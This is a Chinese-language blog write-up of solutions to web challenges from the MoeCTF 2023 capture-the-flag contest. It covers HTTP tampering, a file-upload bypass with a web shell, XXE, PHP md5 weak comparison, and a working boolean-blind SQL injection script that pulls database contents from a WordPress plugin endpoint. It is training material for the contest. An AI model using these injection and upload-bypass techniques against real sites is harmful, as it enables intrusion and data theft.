MoeCTF 2023 Web部分题解

MoeCTF 2023 Web部分题解(实力有限)

1.http

打开地址发现以下任务,

Burp抓一下看看包的内容,

修改包的内容如下

回显得到flag

2.Web入门指北

解码即得

3.彼岸的flag

直接看源码得到flag

根据附件中readme的提示

hackbar发送post注册登录获取flag即可

5.gas!gas!gas!

好好好这题感觉是网不好跑不出来。😭

写个脚本直接跑就行。我自己的脚本没跑出来(虽然感觉没啥问题),用别的师傅跑出来的脚本跑的也没跑出来。

附1我的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from urllib.request import urlopen
import re
import requests
from bs4 import BeautifulSoup

s1="弯道直行,保持这个速度"
s2="弯道直行,抓地力太小了!"
s3="弯道向左,保持这个速度"
s4="弯道向左,抓地力太大了!"
s5="弯道向右,抓地力太大了!"

url="http://localhost:63648/"

p= {
    "driver":"admin",
    "steering_control":"0",
    "throttle":"2"
}

r=requests.post(url,data=p)
session=r.headers.get("Set-Cookie")
session1={"session":session[8:]}
r1=r.text
# print(r1)

for i in range(5):
    if r1[2308:2320].find("弯道向左")!=-1:
        p["steering_control"]="1"
    elif r1[2308:2320].find("弯道向右")!=-1:
        p["steering_control"]="-1"
    else :
        p["steering_control"]="0"
    if r1[2308:2320].find("抓地力太大了")!=-1:
        p["throttle"] = "2"
    elif r1[2308:2320].find("保持这个速度")!=-1:
        p["throttle"] = "1"
    else :
        p["throttle"] = "0"
    r=requests.post(url,data=p,cookies=session1)
    r1=r.text
    print(r1)
print(r1)

附2其他师傅的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import requests
from bs4 import BeautifulSoup


def get_info_from_html(html):
    soup = BeautifulSoup(html, 'html.parser')
    info_div = soup.find('div', {'id': 'info'})
    if info_div:
        return info_div.text
    else:
        return None


def send_post_request(steering_control, throttle, cookie=None):
    url = "http://localhost:55523/"

    headers = {
        "accept": "text/html",
        "content-type": "application/x-www-form-urlencoded",
    }

    data = {
        "driver": "Linmu",
        "steering_control": steering_control,
        "throttle": throttle
    }

    if cookie:
        headers["cookie"] = cookie

    response = requests.post(url, headers=headers, data=data, cookies=None)

    soup = BeautifulSoup(response.text, 'html.parser')
    info_div = soup.find('div', id='info')
    content = info_div.get_text() if info_div else None

    # 获取服务端返回的 Set-Cookie 头部值
    server_cookie = response.headers.get('Set-Cookie', None)

    return content, server_cookie


"""
    <select id="steering_control" name="steering_control" required="">
      <option value="-1">左</option>
      <option value="0" selected="">直行</option>
      <option value="1">右</option>
    </select>
    <select id="throttle" name="throttle" required="">
      <option value="0">松开</option>
      <option value="1">保持</option>
      <option value="2" selected="">全开</option>
    </select>
"""

content, cookie = send_post_request("0", "2")
print(content)

while True:
    if "弯道向右" in content:
        steering_control = "-1"
    elif "弯道向左" in content:
        steering_control = "1"
    else:
        steering_control = "0"

    if "抓地力太小了" in content:
        throttle = "0"
    elif "抓地力太大了" in content:
        throttle = "2"
    else:
        throttle = "1"

    content = send_post_request(steering_control, throttle, cookie)
    print(content)

6.moe图床

阅读源码发现js对前端文件上传类型进行了限制,处理是交给了upload.php。

访问upload.php阅读源码

源码中对content-type进行了检测,抓包改为image/png

explode函数是根据第一个参数将第二个参数分为数组

并且发现源码中$secondSegment=$fileNameParts[1]只对数组中第二位进行检测,那么我们就可以将文件名改为.png.php即可绕过。

直接删除相关部分的js,在控制台对函数进行重新定义,并上传木马。

回显得到文件位置(当前目录为html)

蚁剑连接一下得到flag

7.了解你的座驾

随便访问一辆车,抓包看一下包的内容

发现有xml字样,猜测为xml外部实体注入

url编码后扔回Burp,发包得到flag

8.meo图床

看着和meo图床很像啊,读一下upload.php不给读了。

先传个正常图片看看吧。

查看后观察到url带了参数

那试试能不能直接读flag

看到回显有个Fl3g_n0t_Here_dont_peek!!!!!.php

看看有什么

md5值的比较,因为==弱相等,所以只要字符串开头数字部分相等即可。

随便找两个md5后值为0开头的扔进去得到flag

9.出去旅游的心海

进入wordpress后注意到右侧来访者小登记

发现源码中js将从api获取的数据发向了wp-content/plugins/visitor-logging/logger.php

访问一下

很明显就是sql注入了,从time入手。

根据回显数据插入成功或失败进行布尔盲注

编写脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from urllib.request import urlopen
import re
import requests

url="http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php"
p={
    "ip":"111",
    "user_agent":"111",
    "time":"222 and length(database())={}"
}

# for i in range(30):
#     p = {
#         "ip": "111",
#         "user_agent": "111",
#         "time": f"null and length(database())={i})#"
#     }
#     r = requests.post(url, data=p)
#     r1=r.text
#     print(r1)
#     print(r1.count("成功"))
#     if r1.count("成功")==4:
#         print(i)
#         break


# for j in range(1000):
#     str1="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."
#     for k in str1:
#         p = {
#             "ip": "111",
#             "user_agent": "111",
#             "time": f"null and substr(database(),{j},1)='{k}')#"
#         }
#         r = requests.post(url, data=p)
#         r1 = r.text
#         if r1.count("成功") == 4:
#             print(k)
#             break

# for i in range(300):
#     p = {
#         "ip": "111",
#         "user_agent": "111",
#         "time": f"null and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))={i})#"
#     }
#     r = requests.post(url, data=p)
#     r1=r.text
#     if r1.count("成功")==4:
#         print(i,end='')
#         break

# for j in range(1,206):
#     str1="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."
#     for k in str1:
#         p = {
#             "ip": "111",
#             "user_agent": "111",
#             "time": f"null and substr((select group_concat(column_name) from information_schema.columns where table_name='secret_of_kokomi' and table_schema=database()),{j},1)='{k}')#"
#         }
#         r = requests.post(url, data=p)
#         r1 = r.text
#         if r1.count("成功") == 4:
#             print(k,end='')
#             break

for j in range(1,3506):
    str1="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.{}"
    for k in str1:
        p = {
            "ip": "111",
            "user_agent": "111",
            "time": f"null and binary substr((select content from secret_of_kokomi limit 2,1),{j},1)='{k}')#"
        }
        r = requests.post(url, data=p)
        r1 = r.text
        if r1.count("成功") == 4:
            print(k,end='')
            break

#moectf{Dig_Thr0ugh_Eve2y_C0de_3nd_Poss1bIlIti3s!!}

其实也不用跑字符串长度,直接设个大的长度直接跑就行。(

MoeCTF 2023 Web部分题解
http://example.com/2023/09/18/MoeCTF-2023-Web部分题解/
作者
Ec0y
发布于
2023年9月18日
许可协议